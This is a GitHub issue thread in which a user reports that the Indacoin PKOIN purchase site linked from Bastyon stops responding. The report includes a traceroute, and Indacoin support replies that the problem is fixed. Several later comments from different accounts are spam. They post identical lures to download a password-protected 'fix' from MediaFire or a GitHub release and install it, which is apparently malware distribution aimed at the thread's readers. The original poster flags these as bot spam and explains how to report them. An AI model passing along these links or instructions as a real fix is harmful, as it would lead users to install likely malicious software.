### ISSUE TITLE
Users not able to buy PKOIN using credit card

### ISSUE THREAD

**Issue by Francewhoa** [pocketnetteam/documentation#2]
## Summary

Hello Bastyon community and Indacoin team :)

I'm new to Bastyon. It's my favourite alternative to Facebook, Twitter, and all social medias. I searched the GitHub repositories owned by pocketnetteam but found none about the website at https://bastyon.com So feel free to move this ticket/issue to another repository

## Challenge

This is to notify you that since October 5th, 2020 users are not able to buy PKOIN using a credit card. Including all users who are into not-restricted countries.

We noticed this on october 5th, 2022 at 8:00PM ET. We assumes that since then, Bastyon users are not able to buy PKOIN using this Indacoin website at https://buy.pkoin.indacoin.io

## Steps to reproduce :

1. Go to https://bastyon.com

1. Click on the "Buy" button on the right side of this page

1. This button goes to https://buy.pkoin.indacoin.io/index?address=<MASKED WALLET ID>

1. This website never answer. Wait 15 minutes. Try again. Still no answer. Wait 15 minutes. Try again. Still no answer.

1. The needed end result is that this website answer. So that your clients are able to buy PKOIN.

## Suggested resolution

Yesterday October 5th, 2022 I notified https://indacoin.io about this challenge. They confirmed reception.

## What I tried that failed

• Firefox 102
• Chromium 106
• Tor Browser 11
• Deactivate Proxy/VPN
• Deactivate all browser plug-in

## About me 

• Physically located in Canada

## MTR report

Below is the result of an MTR report. Using "mtr -rw buy.pkoin.indacoin.io"

```
Start: 2022-10-05T20:32:50-0400
HOST: <MASKED>                                          Loss%   Snt   Last   Avg  Best  Wrst StDev
  1.|-- _gateway                                         0.0%    10    0.3   0.3   0.3   0.4   0.0
  2.|-- <MASKED>                                         0.0%    10    8.8   9.0   8.3  10.4   0.7
  3.|-- <MASKED>                                         0.0%    10   23.3  23.2  21.3  26.3   1.4
  4.|-- ???                                             100.0    10    0.0   0.0   0.0   0.0   0.0
  5.|-- <MASKED>.cogentco.com                            0.0%    10   23.5  26.3  23.4  30.2   2.8
  6.|-- <MASKED>.cogentco.com                            0.0%    10   22.1  30.3  22.1  52.6  11.7
  7.|-- motl-b2-link.ip.twelve99.net                     0.0%    10   23.7  25.2  23.3  31.3   2.4
  8.|-- nyk-bb1-link.ip.twelve99.net                     0.0%    10   30.3  32.2  30.3  33.5   0.9
  9.|-- nyk-b3-link.ip.twelve99.net                      0.0%    10   32.1  33.6  30.1  45.0   4.1
 10.|-- nyk-bb2-link.ip.twelve99.net                     0.0%    10   32.8  32.3  30.5  34.5   1.3
 11.|-- ldn-bb1-link.ip.twelve99.net                    10.0%    10  133.3 138.0 133.3 142.3   3.2
 12.|-- hbg-bb3-link.ip.twelve99.net                     0.0%    10  134.8 136.1 134.8 137.5   1.0
 13.|-- kbn-bb1-link.ip.twelve99.net                    10.0%    10  139.3 138.8 138.1 140.3   0.7
 14.|-- kbn-b1-link.ip.twelve99.net                      0.0%    10  136.8 136.1 134.9 137.1   0.7
 15.|-- kbn-bb2-link.ip.twelve99.net                     0.0%    10  123.6 124.0 121.5 128.3   2.1
 16.|-- s-bb2-link.ip.twelve99.net                       0.0%    10  131.2 130.3 128.2 133.2   1.4
 17.|-- hls-b3-link.ip.twelve99.net                      0.0%    10  136.7 136.4 134.8 139.2   1.3
 18.|-- hetzner-svc076536-ic365572.ip.twelve99-cust.net  0.0%    10  139.2 143.0 139.2 167.1   8.5
 19.|-- core32.hel1.hetzner.com                          0.0%    10  138.9 141.0 137.9 145.0   2.0
 20.|-- blocked.hetzner.com                              0.0%    10  177.6 162.1 145.5 209.3  23.0
 21.|-- ???                                             100.0    10    0.0   0.0   0.0   0.0   0.0
```

Notice above the:
* `blocked` on line 20
* `100%` packet lost on line 21

Cheers,

Francois

https://bastyon.com/francewhoa

**Comment by Francewhoa** [comment]
Reply from Indacoin

> Indacoin Support
> 
> Wed, 10/05/22 10:04 pm 	
>  
> Hello! Thank you, we will contact the developers and let them know.

**Comment by Francewhoa** [comment]
Reply from Indacoin

> Indacoin Support
> Fri, 10/07/22 10:24 am 	
>  
> Hello! Our developers investigated and fixed the problem. Please try again and feel free to contact us if you have any other questions!

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Francewhoa** [comment]
This ticket is targeted by mass spammer bots. Which are allegedly controlled by people with Evil behaviors.

For those interested to report deleted spam comments, the suggested steps are:

1. Go to https://support.github.com/contact?source=subtitle&tags=rr-general-technical
2. Fill the form. Including the URL to the deleted spam comment. Which can be found into each email message notification. Right click on it and select copy. For example `https://github.com/pocketnetteam/documentation/issues/2#issuecomment-2314483854`
3. Click on the first "Submit" button
4. Ignore the suggestions from Co Pilot bot. They are useless. Because they all failed with deleted comments on GitHub. 
5. Still on the same form page, at the bottom, click on the new "Submit" button. So that GitHub receive your ticket. Wait for GitHub reply.

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
